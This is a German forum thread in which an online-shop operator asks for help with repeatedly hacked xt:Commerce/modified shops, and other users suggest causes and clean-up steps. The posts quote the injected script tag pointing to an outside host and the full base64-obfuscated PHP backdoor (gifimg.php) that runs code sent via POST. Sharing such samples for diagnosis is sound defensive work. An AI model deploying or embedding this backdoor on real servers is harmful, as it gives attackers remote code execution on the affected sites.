modified eCommerce Shopsoftware wurde gehackt? (Virusbefall der Javascript-Dateien)

[rayban]

Hallo Tomcraft, habe ein riesen Problem... ich betreibe viele xtc seiten... alle meine seiten werden angegriffen und lahm gelegt. das virus kommt meisten durch java dateien durch, es deaktivier erst includes/configure.php den CHMOD auf 755 und danach findet man in java dateien documet.write script, ich nehme an das es mit includes/general.js anfängt zu überschreiben.. ich habe danach xtc modified instaliert, aber es hört trotzdem nicht auf. VIELE SEITEN VON MIR SIND MITLERWEILE SCHON IM BLACKLIST gelandet. Kann es sein das der script im datenbank hinterlegt ist??

Hier ein beispiel was dieses sript einträgt, So sicht es nach der hack atacke aus:

Code: PHP  [Auswählen]

<script src=http:// covershotslifestyle . com / images/ gifimg.php></script>
 

bei xtc modified greift es so wie ich es sehe jquery und thickbox xtc5/template und emos32_xtc includes/econda includes/general.js an. Man findet danach in jeder html seite diesen script bis der shop kracht..

Vieleicht ist dieser beitrag interesant für euch, vieleicht könnt ihr mir weiterhelfen.



Linkback: https://www.modified-shop.org/forum/index.php?topic=4275.0

[DokuMan]

Kann es sein, das du das Ding lokal auf dem Rechner hast und er dir die JavaScript-Dateien beim Upload über FTP ändert?

[Tomcraft]

Wir hatten ähnliche Fälle hier im Forum, bei denen lag der Viren-Befall auf dem lokalen PC!

Grüße

Torsten

[rayban]

jaaaaaaaaaa genau das kann sein, werde mein pc neu instalieren, ich werde berichten.

danke vorab

[ponyhof]

Hatte ich auch schon mehrmals leider !

Nach Umstieg auf Modified und ändern sämtlicher FTP Passwörter (verschiedene Shops) ist nun seit 6 Monaten Ruhe !

Also änder auf jeden Fall auch die PWs !

Grüße

[econda]

Hallo,

ein Hinweis zumindest für das betroffene econda Modul: Es handelt sich um eine sehr alte Schnittstelle, die hier noch eingesetzt wird. Bei neueren Versionen tritt dies –zumindest bei der econda Schnittstelle- nicht mehr auf.
econda Kunden können die aktuelle und sichere Version im econda Supportforum herunterladen (Bitte mit dem bekannten Passwort anmelden).

Für weitere Fragen hilft auch gerne das econda Team weiter.

Viele Grüße
Das econda Team

[EDIT Tomcraft: Links entfernt, siehe Foren-Regeln]

[rayban]

Hallo Jungs, also ich habe mein PC neu installiert und habe mit frischem WINDOWS und FILEZILLA alles nochmal hochgefahren, das Problem ist immer noch da, die seiten krachen eine nach andern ab... Das ist ein Hardcore Virus, Ich habe auch festgestellt das irgentwelche PHP dateien hochgefahren werden.. Es ist immer in einen IMAGE ORDER abgelegt, der name ist von diesem file: gifimg.php der inhalt:

Code: PHP  [Auswählen]

<?php  eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?> .

Was bedeutet das?? was macht dieser script?? Der hammer ist auch, ich habe 2 verschiedene Provider, bei dem einen gibt es eine Überschreib-sperre, bei dem andern nicht. Der Provider mit der Überschreib sperre ist bis jetzt nicht zusammengebrochen ( 2TAGE ), bei dem ohne hält die installation höchstens 2 tage... dann ist der virus drin. Ich nehme an das der virus durch den fckeditor reinkommt... was nur eine vermutung ist.. werde jetzt das letzt mal ohne fckeditor alles hochfahren und installieren, glaube nicht das es standhält...

Meine frage ist, kann es sein das der WURM in der DATABASE ist??
Ich habe auch schon mit meinen Leptop alles hochgefahren, wenn bei mir im PC ein virus gibt dann nicht auf mein Leptop...

Meine bitte ist XTC sicherer zu machen, ich kann euch die datenbank und den Provider geben, dann könnt ihr euch selber von diesem LECK überzeugen..

Freue mich über jede idee

[guensi]

[...] Das ist ein Hardcore Virus, Ich habe auch festgestellt das irgentwelche PHP dateien hochgefahren werden.. Es ist immer in einen IMAGE ORDER abgelegt, der name ist von diesem file: gifimg.php der inhalt:

Code: PHP  [Auswählen]

<?php  eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?> .

Was bedeutet das?? was macht dieser script?? [...]

Nun dieses Script macht folgendes:
Es führt über eval die decod(e)ierung und wohl auch Ausführung des nachfolgenden Codes aus und installiert dir damit vermutlich immer wieder den Schadcode als Scripte oder sonstwas in dem befallenen Shop.

Die Frage ist nun - wo kommen diese php Dateien her?

[BeBa]

Der Schadcode kommt über e-Mails (medbox.../angebote über Viagra...) nicht über den FCK, der Modifiedshop ist was das angeht sicher. Genaueres kann man hier nachlesen:
http://forum.wordpress-deutschland.org/installation/62164-wo-ist-der-hack-versteckt.html
Eine komplett Löschung bringt leider auch nicht immer den gewünschten Erfolg, da der Schadcode noch weitere Dateien einspeist die nicht so einfach zu finden sind, unter anderem diese wieder verschlüsselt und zum teil gar nicht zu finden sind.... auch im Template. Meist kommt der Schadcode dann wieder.
Eine Decodierung deines Schadcodes kannst du mal hier Probieren, wenns weiter hilft:
http://www.functions-online.com/base64_decode.html
Der Schadcode macht grad seine runde, weltweit sogar und ist richtig hartnäckig, teilweise mit umleitung auf die besagte "Viagra - Seite"

Meine Empfehlung wäre mit einem Linux Betriebssystem, alles was den Shop angeht zu bearbeiten, nicht mit Windows.

Leider keine große Hilfe, ich weiß. Aber immerhin die Info das, das von den e.Mails mal wieder kommt.
Grüße Bernard

[Tomcraft]

Zumindest sind wir uns sicher, dass wir dahingehend kein Leck haben.

Auch wenn es ärgerlich ist, aber ein guter Virenschutz gehört nunmal auf jeden PC! Die Lücke ist bei dir auf dem PC entstanden und nicht auf dem Server.

Grüße

Torsten

[rayban]

Hey Tomcraft, wenn ihr euch so sicher seit das alles von PC kommt, warum probiert ihr nicht eine installation wie ichs euch schon unterbreitet habe. Der webspace ist von FLATBOOSTER und ist auf 0, also alles schon gelöscht. ihr braucht nur die datenbank die ich euch gebe. ich nehme an das dieses problem keiner knacken wird, schade, xtc ist die beste software die ich bis jetzt gesehen hatte, und ich denke ich werde in der zukunft nicht der einzige mit diesem problem bleiben.

grüße an alle

[Tomcraft]

Ist denn der Server aktuell gepatched oder sind dort evtl. noch Sicherheitslücken?!

Grüße

Torsten

[Hetfield]

Du musst nicht nur den PC säubern und denken es ist wieder gut! Und wenn der Laptop im selben Netzwerk wie dein PC war und genauso gut geschützt ist wie dein PC, dann ist er unter Garantie auch infiziert.

Gehe folgendermaßen vor und benutze einen virenfreien/trojanerfreien PC dazu:

• Ändere ALLE Zugangsdaten (FTP, MySQL, Konfigmenü etc.)!!!
• Lösche ALLES vom Server (auch Datenbanken), wenn du in der Bereinigung von infizierten Dateien keine Erfahrung hast und installiere alles noch mal neu oder spiele ein sauberes Backup ein.
• Besorge Dir eine vernünftige Sicherheitssoftware und eine gute Firewall für dein System.
• Ändere die Passwörter in regelmäßigen Abständen und verwende nur sichere Passwörter!

MfG Hetfield  

[rayban]

rayban an tomcraft, ich weiss es nicht. ich habe für mein kollegen modified eCommerce Shopsoftware installiert, der läuft wunderbar, des ist der selber provider. ob es gepatched weiss ich nicht

gruss

rayban

[floh]

rayban an tomcraft, ich weiss es nicht. ich habe für mein kollegen modified eCommerce Shopsoftware installiert, der läuft wunderbar, des ist der selber provider. ob es gepatched weiss ich nicht

gruss

rayban

FORUM an rayban, sollen wir denn alles aus der geheimnisvollen und allwissenden Glaskugel herausfinden?  

Du möchtest kostenlose Hilfe im Forum haben? Kein Problem, dafür sind wir ja da! Aber ohne notwendigen Info's wird es halt schwer! Wenn Du schon in mehreren Foren warst, dann hast Du ja festgestellt, das es hier recht manierlich zugeht. So soll es auch bleiben!  

Es gibt in der Signatur von Tomcraft einen schönen Link: http://www.modified-shop.org/forum/topic.php?id=2357      

Schöne Grüße aus Osthessen....

floh